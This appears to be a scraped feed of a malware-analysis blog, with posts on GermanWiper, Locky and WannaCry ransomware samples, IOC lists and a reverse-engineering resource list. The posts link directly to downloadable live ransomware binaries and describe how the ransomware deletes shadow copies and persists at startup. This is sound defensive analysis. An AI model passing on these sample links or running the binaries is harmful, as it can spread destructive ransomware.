</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-filepng.png"></center>
</br>
</br>
With this sample we also get to see a new domain for a control server at expandingdelegation[.]top (<em>8.208.13.24</em>) in the ransom note, so this sample might already be part of a second wave since it was still dropping the executable today (02.08.2019).
</br>
</br>
<img alt="Parsed file" src="https://dissectingmalwa.re/img/germanWiper-newURL.png">
</br>
</br>
A couple of noteworthy events after running the sample in a virtual machine: The Ransomware runs vssadmin.exe to delete system restore points and shadow copies. Furthermore this command will disable recovery options at system startup, but not without first asking the victim for their approval first (how nice of them).
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-vssadmin.png"></center>
</br>
</br>
The seemingly arbitrary process description of the GermanWiper process might be a handy string to keep in mind for identification of samples in the future.
</br>
</br>
<img alt="Parsed file" src="https://dissectingmalwa.re/img/germanWiper-ph.png">
</br>
</br>
To display the ransomnote after system startup it creates two entries in the start menue..
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-start.png"></center>
</br>
</br>
..and an entry to open the html Ransom-File in the msconfig autostart.
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-autostart.png"></center>
</br>
</br>
</br></p>
<h2><em>IOCs</em></h2>
<h3>Files</h3>
<div class="highlight"><pre><span></span><span class="n">wiper</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--SHA1--> 8cd96603cdd2637cf5469aba8ed2b149c35ef699</span>
<span class="n">Arbeitszeugnisse</span> <span class="o">-</span> <span class="n">Lebenslauf</span> <span class="o">-</span> <span class="n">Doris</span> <span class="n">Sammer</span><span class="p">.</span><span class="n">zip</span> <span class="c1">--SHA1--> 058ad51c8eb86545a5424c0b021235da3bbce1c8</span>
<span class="n">Doris</span> <span class="n">Sammer</span> <span class="o">-</span> <span class="n">Arbeitszeugnisse</span> <span class="n">Aktuell</span><span class="p">.</span><span class="n">doc</span><span class="p">.</span><span class="n">lnk</span> <span class="c1">--SHA1--> 2d8f89693d14b9ea7a056bced983dfc88fe76105</span>
<span class="n">Doris</span> <span class="n">Sammer</span> <span class="o">-</span> <span class="n">Lebenslauf</span> <span class="n">Aktuell</span><span class="p">.</span><span class="n">doc</span><span class="p">.</span><span class="n">lnk</span> <span class="c1">--SHA1--> 77d5224fc02999b04ab79054aad23b0f6213b7eb</span>
</pre></div>
<h3>Malspam Domains</h3>
<div class="highlight"><pre><span></span><span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">rasendmail</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">stadtmailer</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">nrwmail</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">mailplatz</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Dropper URLs/IPs</h3>
<div class="highlight"><pre><span></span><span class="mi">173</span><span class="p">.</span><span class="mi">33</span><span class="p">.</span><span class="mi">106</span><span class="p">[.]</span><span class="mi">120</span>
<span class="n">moneymaker</span><span class="p">[.]</span><span class="n">software</span>
<span class="n">expandingdelegation</span><span class="p">[.]</span><span class="n">top</span>
</pre></div>
<h3>Skipped Folders and Filenames</h3>
<div class="highlight"><pre><span></span><span class="n">autorun</span><span class="p">.</span><span class="n">inf</span>
<span class="n">boot</span><span class="p">.</span><span class="n">ini</span>
<span class="n">bootfont</span><span class="p">.</span><span class="n">bin</span>
<span class="n">bootsect</span><span class="p">.</span><span class="n">bak</span>
<span class="n">desktop</span><span class="p">.</span><span class="n">ini</span>
<span class="n">iconcache</span><span class="p">.</span><span class="n">db</span>
<span class="n">ntldr</span>
<span class="n">ntuser</span><span class="p">.</span><span class="n">dat</span>
<span class="n">ntuser</span><span class="p">.</span><span class="n">dat</span><span class="p">.</span><span class="n">log</span>
<span class="n">ntuser</span><span class="p">.</span><span class="n">ini</span>
<span class="n">bootmgr</span>
<span class="n">bootnxt</span>
<span class="n">thumbs</span><span class="p">.</span><span class="n">db</span>
<span class="n">Windows</span>
<span class="n">recycle</span><span class="p">.</span><span class="n">bin</span>
<span class="n">mozilla</span>
<span class="n">google</span>
<span class="n">boot</span>
<span class="n">application</span> <span class="k">data</span>
<span class="n">appData</span>
<span class="n">program</span> <span class="n">files</span>
<span class="n">program</span> <span class="n">files</span> <span class="p">(</span><span class="n">x86</span><span class="p">)</span>
<span class="n">programme</span>
<span class="n">programme</span> <span class="p">(</span><span class="n">x86</span><span class="p">)</span>
<span class="n">programdata</span>
<span class="n">perflogs</span>
<span class="n">intel</span>
<span class="n">msocache</span>
<span class="k">System</span> <span class="n">Volume</span> <span class="n">Information</span>
</pre></div>
<p></br>
Thanks again to <a href="https://twitter.com/demonslay335">@Demonslay335</a>, <a href="https://twitter.com/James_inthe_box">@James_inthe_box</a> and all the other researchers who contributed to the anlysis of this threat. This article has also been mentioned in this excellent <a href="https://www.zdnet.com/article/germanwiper-ransomware-hits-germany-hard-destroys-files-asks-for-ransom/">ZDNet Article</a>, which is quite an honor, thanks :D</p>Picking Locky π2019-07-30T00:00:00+02:002019-07-30T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-07-30:/picking-locky.html<p>Back in 2016 Locky was (one of) the first to commercialize the "art" of holding data for ransom. I picked this strain because I would like a bit more of a challenge in terms of obfuscation and anti-disassembly techniques, so strap in for this OG Ransomware</p><p>Locky (at least the first few versions) is said to be created by the makers of the Dridex/Cridex banking trojans. For example the spreading mechanism via macros in Word or Excel documents sent out via carefully crafted spear-phishing emails is exactly the same for both of these strains.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<h3>Todays samples are brought to you by:</h3>
<p>Locky #1 available @ <a href="https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Locky">https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Locky</a>
<code>sha256 bc98c8b22461a2c2631b2feec399208fdc4ecd1cd2229066c2f385caa958daa3</code></p>
<p>Locky.AZ available @ <a href="https://s3.eu-central-1.amazonaws.com/dasmalwerk/downloads/2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b/2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b.zip">https://dasmalwerk.eu/</a>
<code>sha256 2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b</code>
</br>
</br>
</br>
<img alt="Running Locky" src="https://dissectingmalwa.re/img/locky-ph.png">
</br>
</br>
Running this first Locky Sample was pretty unspectacular since nothing really happend π€. Let's take a look at the binary first:</p>
<p><img alt="Locky Import Information" src="https://dissectingmalwa.re/img/locky-import.png"></p>
<p><img alt="Running it through Detect it easy" src="https://dissectingmalwa.re/img/locky-die.png">
</br>
</br>
Would you look at that! We found ourselves some poor mans obfuscation :D A whole bunch of random strings to make the analyst's life just a little bit harder. We'll come back to this later to see if we can simplify our strings output a bit.
</br>
</br>
<img alt="Found strings" src="https://dissectingmalwa.re/img/locky-strings.png"></p>
<p>After a couple of seconds it spawns a new svchost.exe process with the same icon as Locky.exe had previously. Of course we'll dump the process memory to a file (just right-click the listing in Process Hacker and choose <em>Create dump</em> from the context menu).
</br>
</br>
</br>
<img alt="Found strings" src="https://dissectingmalwa.re/img/locky-ph2.png">
</br>
</br>
</br>
Looking at the properties of the new <em>svchost.exe</em> process we can see that it is actually run from C:\Users\IEUser\AppData\Local\Temp\ and it's unsigned as well.
</br>
<center><img alt="Running as svchost.exe" src="https://dissectingmalwa.re/img/locky-svchost.png"></center>
</br>
</br>
</br></p>
<h2>Trojan.Ransom.Locky.AZ</h2>
<p><center><img alt="This one is just a literal element" src="https://dissectingmalwa.re/img/locky_az-run.png"></center></p>
<p>https://www.hybrid-analysis.com/sample/2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b/5cd5813d028838383d3ab408</p>
<p><img alt="Running Locky.AZ" src="https://dissectingmalwa.re/img/locky_az-info.png"></p>
<p>This article is a work in progress, updates going to follow soon</p>
<h2><em>IOCs</em></h2>
<h3>Locky (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">2</span><span class="n">e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b</span>
<span class="mi">5</span><span class="n">ed2f09e648dca8f0ca75466b1442f6e599afddc80777e0559fb6881c6cd9ff3</span>
<span class="mi">3</span><span class="n">b60fde281d91cc3e7ea3e343ee5b13a31def564903c0136ae928f70e25c3c02</span>
<span class="mi">6</span><span class="n">afc78b5630726c907a69d62a6c8a7d86326e21383fe3aae1efc715342238e02</span>
</pre></div>Third time's the charm? Analysing WannaCry samples2019-07-28T00:00:00+02:002019-07-28T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-07-28:/third-times-the-charm-analysing-wannacry-samples.html<p>After over two years since the inital spread of the ransomware and Malwaretechs sentencing last week I got a bit nostalgic and took a second look at different samples</p><p><img alt="Running a sample in a Windows 7 VM" src="https://dissectingmalwa.re/img/run.png"></p>
<p></br>
Since the first wave of infections in May 2017 WannaCry is basically the goto example for the whole ransomware scheme and that is actually a good thing. The potential damage that WannaCry and the variants following the original version would have been massive if it wouldn't have been for Malwaretech, 2sec4u and all the other researchers who helped to contain the spread of ransomware powered by the wormable EternalBlue exploit. Funnily enough there are still people from around the world that pay the ~300$ ransom in hopes to get their data decrypted as can be seen <a href="https://twitter.com/actual_ransom">here</a>.
</br></p>
<h4><em>A general disclaimer as always: downloading and running the samples (especially the ones without the kill switch) linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p></br></p>
<h3>The three samples I'll be looking at:</h3>
<p>Wannacry Sample #1 sometimes referred to as "dropper" available @ <a href="https://www.ghidra.ninja/samples/wannacry.zip">https://www.ghidra.ninja/samples/wannacry.zip</a>
<code>sha256 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c</code></p>
<p>Wannacry Sample #2 sometimes referred to as "encryptor" available @ <a href="https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry">https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry</a>
<code>sha256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</code></p>
<p>Wannacry Plus available @ <a href="https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry_Plus">https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry_Plus</a>
<code>sha256 55504677f82981962d85495231695d3a92aa0b31ec35a957bd9cbbef618658e3</code>
</br>
</br>
</br>
The first thing we're going to take a look at is the symbol tree. Stepping into the function called <em>entry</em>: we notice that it is in fact not the main / WinMain function, but rather a preparing function that will call WinMain at the end (this might acutally be an artifact of Ghidra's decompiler). </p>
<p><img alt="functions window" src="https://dissectingmalwa.re/img/functions.png">
</br>
</br>
</br>
Because the decompilation result in our WinMain function is not that pretty yet we will edit its function signature to match the one described in the <a href="https://docs.microsoft.com/en-us/windows/win32/learnwin32/winmain--the-application-entry-point">Win32 API Reference</a>.
</br>
</br>
</br>
<code>int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow);</code>
</br>
</br>
</br>
<img alt="Setting the correct function signature for WinMain" src="https://dissectingmalwa.re/img/sig-correct.png"></p>
<p></br>
</br>
After this is done the decompilation result will be much better and easier on the eyes. One of the first things you will spot is the famous <em>Kill Switch URL</em> registered by Malwaretech after the inital outbreak which is to this day pointing to the Kryptos Logic sinkhole. After Line 41 you are also able to see multiple InternetOpen etc. function calls that will check if the aforementioned URL is registered and reachable. If that is the case it will close the connection socket and exit to WinMain before the encryption processs even started. Of course this also means that if the infected PC is not connected to the Interwebs (remember it propagates via SMB over local networks as well) or is unable to resolve the domain name the ransomware will go to town with the user's files.
</br>
</br>
Looking into sample #2 there is acutally no such kill switch which means that it is one of the later versions following the inital outbreak. </p>
<p><img alt="Decompilation result after setting the function signature" src="https://dissectingmalwa.re/img/winmain_sig.png">
</br>
</br>
</br>
To show the differences between the kill switched first sample and the second rambo version I fired up hasherezade's awesome PE-Bear and loaded Sample #2 and #1. This indeed confirms that the samples are basically the same, but version #2 is missing the notorious kill switch. </p>
<p><img alt="Comparison of Sample #1 and #2" src="https://dissectingmalwa.re/img/bear_comp.png"></p>
<p></br>
</br>
</br>
</br></p>
<h2>WannaCry Plus</h2>
<p>I haven't heard of this strain/ variant before, but it got it's own subfolder in ytisf's TheZoo so it has to be special in some way, right? Let's first check the entropy of the binary with "Detect it easy" to see if it is packed or obfuscated in any way:</p>
<p><img alt="Detect it easy's entropy window" src="https://dissectingmalwa.re/img/wc_plus-die.png"></p>
<p>Looking at the entropy graph we can pretty comfortably say that the PE is neither packed nor obfuscated (which would have been out of the ordinary for a WannaCry sample anyway). Looking at the symbol tree we are greated with a new function called PlayGame. Please no Fortnite ransomware kthxbye :D We'll have a look into that later..
</br>
</br></p>
<p><img alt="The Symbol tree of WannaCry Plus" src="https://dissectingmalwa.re/img/wc_plus-fuctions.png">
</br>
</br>
Jumping into the entry function things are looking quite different compared to first two samples. Following the procedure we are dropped into FUN_10001016 which is what i presume the file encryption function. This pretty easy to spot through the rather characteristic combination of <em>FindResourceA</em>, <em>CreateFileA</em> and <em>WriteFile</em>.
</br>
</br>
<img alt="What I presume to be the encryption function" src="https://dissectingmalwa.re/img/wc_plus-enc.png"></p>
<p>To see what happens if I run the malware I fired up a Windows 7 x86 VM in VirtualBox provided by <a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/">https://modern.ie/</a>. After seeing the error message below I thought the executable might actually be a x86_64 one since it refuses to run on the 32-bit Windows 7 System. Even these days it is actually quite unusual for malware to be compiled for x64 systems only since it'll cut out a lot of the old and vulnerable systems running x86 XP for example (which is kind of a no-brainer since the potatohead holding PCs for ransom would want to maximise the attack surface and earnings).
</br>
</br>
<img alt="Running WannaCry Plus in a VM" src="https://dissectingmalwa.re/img/wc_plus-run.png">
Kudos to Microsoft in this case: Their Defender and SmartScreen really stepped up their game. For an attacker and (sadly) for a malware reverse engineer it is actually quite difficult to circumvent or disable the built in Mal-/Ransomware Protection. You are constantly greeted with Pop-Ups about a detected ransomware executable and the Defender will even go as far as simply deleting your precious sample :(
<img alt="Running WannaCry Plus in a Win10 x86_64 VM" src="https://dissectingmalwa.re/img/wc_plus-mal.png">
But even after calming down the Windows Defender I couldn't get the malware to encrypt anything :S
<img alt="Running WannaCry Plus in a Win10 x86_64 VM" src="https://dissectingmalwa.re/img/wc_plus-norun.png">
Looking at the Anyrun Sandbox Analysis <a href="https://app.any.run/tasks/f889f338-712f-44aa-b387-f501f3ed7c48/">over here</a> we see the same error message but it seems to drop another executable called "SearchProtocolHost.exe" which is probably RunPE Process Hollowing at play. The next step will probably be manual debugging, so stay tuned! </p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Wannacry (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">24</span><span class="n">d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c</span>
<span class="n">ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</span>
<span class="mi">55504677</span><span class="n">f82981962d85495231695d3a92aa0b31ec35a957bd9cbbef618658e3</span>
<span class="mi">32</span><span class="n">f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf</span>
<span class="mi">697158</span><span class="n">bcade7373ccc9e52ea1171d780988fc845d2b696898654e18954578920</span>
<span class="n">ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</span>
</pre></div>Useful Resources for Reverse Engineering and Malware Analysis2019-06-01T00:00:00+02:002019-06-01T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-06-01:/useful-resources-for-reverse-engineering-and-malware-analysis.html<p>Just another collection of links, videos, books and other materials related to RE and Malware Research</p><p>I'll update this list regularly to keep it somewhat relevant, so be sure to bookmark this page if you like the contents so far.
</br>
</br></p>
<h2>Books</h2>
<ul>
<li>
<p>"Reversing: Secrets of Reverse Engineering" by Eldad Eilam</p>
</li>
<li>
<p>"Reversing: secrets of reverse engineering practical reverse engineering: x86, x64, ARM, Windows kernel, Reversing tools, and obfuscation" by Bruce Dang, Alexandre Gazet and Elias Bachaalany</p>
</li>
<li>
<p>"The Shellcoder's Handbook: Discovering and Exploiting Security Holes" by Chris Anley, John Heasman, Felix Lindner and Gerardo Richarte</p>
</li>
<li>
<p>"Hacker Dissassembling Uncovered" by Kris Kaspersky</p>
</li>
<li>
<p>"The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System" by Bill Blunden</p>
</li>
<li>
<p>"Practical Malware Analysis - The Hands-On Guide to Dissecting Malicious Software" by Michael Sikorski and Andrew Honig</p>
</li>
<li>
<p>"Malware Data Science - Attack Detection and Attribution" by Joshua Saxe and Hillary Sanders</p>
</li>
<li>
<p>"The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory" by Michael Hale-Ligh, Andrew Case, Jamie Levy and Aaron Walters</p>
</li>
<li>
<p>"Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code" by Michael Hale-Ligh, Steven Adair, Blake Hartstein and Matthew Richard</p>
</li>
<li>
<p>"Practical Binary Analysis - Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly" by Dennis Andriesse</p>
</li>
<li>
<p>"Practical Forensic Imaging - Securing Digital Evidence with Linux Tools" by Bruce Nikkel</p>
</li>
<li>
<p>"Rootkits and Bootkits - Reversing Modern Malware and Next Generation Threats" by Alex Matrosov, Eugene Rodionov and Sergey Bratus</p>
</li>
</ul>
<p></br>
</br></p>
<h2>Websites</h2>
<ul>
<li><a href="https://ghidra.re">https://ghidra.re</a></li>
<li><a href="https://begin.re">https://begin.re</a></li>
</ul>
<p></br></p>
<h3>Blogs</h3>
<ul>
<li>
<p><a href="https://malwaretech.com">https://malwaretech.com</a></p>
</li>
<li>
<p><a href="https://hshrzd.wordpress.com/">https://hshrzd.wordpress.com/</a> especially <a href="https://hshrzd.wordpress.com/how-to-start/">https://hshrzd.wordpress.com/how-to-start/</a></p>
</li>
<li>
<p><a href="https://blog.malwarebytes.com/">https://blog.malwarebytes.com/</a></p>
</li>
<li>
<p><a href="https://blog.talosintelligence.com/">https://blog.talosintelligence.com/</a></p>
</li>
</ul>
<p></br>
</br></p>
<h2>Tools</h2>
<ul>
<li><a href="https://ghidra-sre.org">Ghidra SRE</a>: The RE Toolkit developed by the NSA</li>
<li><a href="https://www.hex-rays.com/products/ida/support/download_freeware.shtml">IDA Free</a>: The Freeware Version of the popular IDA Toolkit by Hex-Rays</li>
<li><a href="http://www.angusj.com/resourcehacker/">Resource Hacker</a></li>
<li><a href="https://processhacker.sourceforge.io/">Process Hacker 2</a>: Allows you to view processes with more detail than Windows Task Manager. Can also dump memory etc.</li>
<li><a href="https://hshrzd.wordpress.com/pe-bear/">PEBear</a></li>
<li><a href="https://hshrzd.wordpress.com/pe-sieve/">PESieve</a></li>
<li><a href="https://x64dbg.com/">x64Dbg</a>: x64Debug is the defacto tool for dynamic analysis and dumping</li>
<li><a href="https://github.com/horsicq/Detect-It-Easy">Detect it easy</a></li>
<li><a href="https://download.cnet.com/ExEinfo-PE/3000-2248_4-10523354.html">ExeInfo PE</a>: Similar to Detect it easy</li>
<li><a href="https://code.google.com/archive/p/lnk-parser/">LNKParser</a>: Parses Windows LNK Files</li>
<li><a href="https://blog.didierstevens.com/programs/oledump-py/">oledump</a></li>
<li><a href="https://virtualbox.org">Oracle VirtualBox</a></li>
</ul>
<p></br>
</br></p>
<h2>Videos</h2>
<p></br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/OeG4KBWB-EY" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/L8lA1pNvcz4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/cpu19-20-anatomie-eines-malware-droppers-emotet-in-der-praxis/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/k5ToL0J7uL0" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/froscon2019-2350-ghidra_-_an_open_source_reverse_engineering_tool/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/33c3-7901-pegasus_internals/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><iframe width="560" height="315" src="https://media.ccc.de/v/35c3-9617-a_deep_dive_into_the_world_of_dos_viruses/oembed" frameborder="0" allowfullscreen></iframe></center>
</br>
</br></p>printf("Hello World\n");2019-03-18T22:35:00+01:002019-03-18T22:35:00+01:00f0wLtag:dissectingmalwa.re,2019-03-18:/printfhello-worldn.html<p>Hey there, looks like you somehow found your way onto my new site. If you are into malware analysis, reverse engineering and that sort of jazz have a look around and stay awhile!</p>